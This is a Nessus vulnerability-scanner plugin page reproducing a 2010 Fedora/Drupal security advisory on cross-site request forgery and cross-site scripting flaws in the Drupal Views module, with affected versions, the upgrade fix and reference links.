Fedora 11 : drupal-views-6.x.2.11-1.fc11 (2010-10197)

This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.


Synopsis :

The remote Fedora host is missing a security update.

Description :

- Advisory ID: DRUPAL-SA-CONTRIB-2010-067
(http://drupal.org/node/829840) * Project: Views
(third-party module) * Version: 5.x, 6.x * Date:
2010-June-16 * Security risk: Less critical *
Exploitable from: Remote

- Vulnerability: Multiple vulnerabilities --------
DESCRIPTION
--------------------------------------------------------
- The Views module provides a flexible method for Drupal
site designers to control how lists and tables of
content are presented. -------- CROSS SITE REQUEST
FORGERY (CSRF) ----------------------------------- The
Views UI module, which is included with Views, can be
used to enable/disable Views by following a link to a
particular page (e.g.
admin/build/views/disable/frontpage). As no protections,
such as form tokens, are in place to prevent forged
requests to these pages, the feature is vulnerable to a
Cross Site Request Forgery (CSRF [1]) that would allow
an attacker to enable/disable all Views on a site.
Mitigating factors: If Views UI module is disabled Views
will no longer be affected by this vulnerability. This
issue affects Views for Drupal 5 and Drupal 6. --------
CROSS SITE SCRIPTING (XSS)
------------------------------------------ Under certain
circumstances, Views could display URLs or aggregator
feed titles without escaping, resulting in a Cross Site
Scripting (XSS [2]) vulnerability. An attacker could
exploit this to gain full administrative access. This
issue affects Views for Drupal 6 only. -------- VERSIONS
AFFECTED
--------------------------------------------------- *
Views module for Drupal 5.x versions prior to 5.x-1.8 *
Views module for Drupal 6.x versions prior to 6.x-2.11
Drupal core is not affected. If you do not use the
contributed Views [3] module, there is nothing you need
to do. -------- SOLUTION
--------------------------------------------------------
---- Install the latest version: * If you use the Views
module for Drupal 5.x upgrade to Views 5.x-1.8 [4] * If
you use the Views module for Drupal 6.x upgrade to Views
6.x-2.11 [5] See also the Views project page [6].
-------- REPORTED BY
--------------------------------------------------------
- * The Cross Site Request Forgery (CSRF) vulnerability
was reported by Martin Barbella (mbarbella [7]). * The
Cross Site Scripting (XSS) vulnerabilities were reported
by Earl Miles (merlinofchaos [8]), module maintainer and
Daniel Wehner (dereine [9]), module co-maintainer
-------- FIXED BY
--------------------------------------------------------
---- * Earl Miles (merlinofchaos [10]), module
maintainer -------- CONTACT
--------------------------------------------------------
----- The Drupal security team [11] can be reached at
security at drupal.org or via the form at
http://drupal.org/contact. * [1]
http://en.wikipedia.org/wiki/Csrf * [2]
http://en.wikipedia.org/wiki/Cross-site_scripting * [3]
http://drupal.org/project/views * [4]
http://drupal.org/node/829848 * [5]
http://drupal.org/node/829846 * [6]
http://drupal.org/project/views * [7]
http://drupal.org/user/633600 * [8]
http://drupal.org/user/26979 * [9]
http://drupal.org/user/99340 * [10]
http://drupal.org/user/26979 * [11]
http://drupal.org/security-team

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.

See also :

http://drupal.org/node/829840
http://drupal.org/node/829846
http://drupal.org/node/829848
http://drupal.org/project/views
http://en.wikipedia.org/wiki/Cross-site_scripting
http://en.wikipedia.org/wiki/Csrf
http://www.nessus.org/u?9e24a3bc

Solution :

Update the affected drupal-views package.

Risk factor :

High

Family: Fedora Local Security Checks

Nessus Plugin ID: 47213 (fedora_2010-10197.nasl)

Bugtraq ID:

CVE ID:

Ready to Amp Up Your Nessus Experience?

Get Nessus Professional to scan unlimited IPs, run compliance checks & more

Buy Nessus Professional Now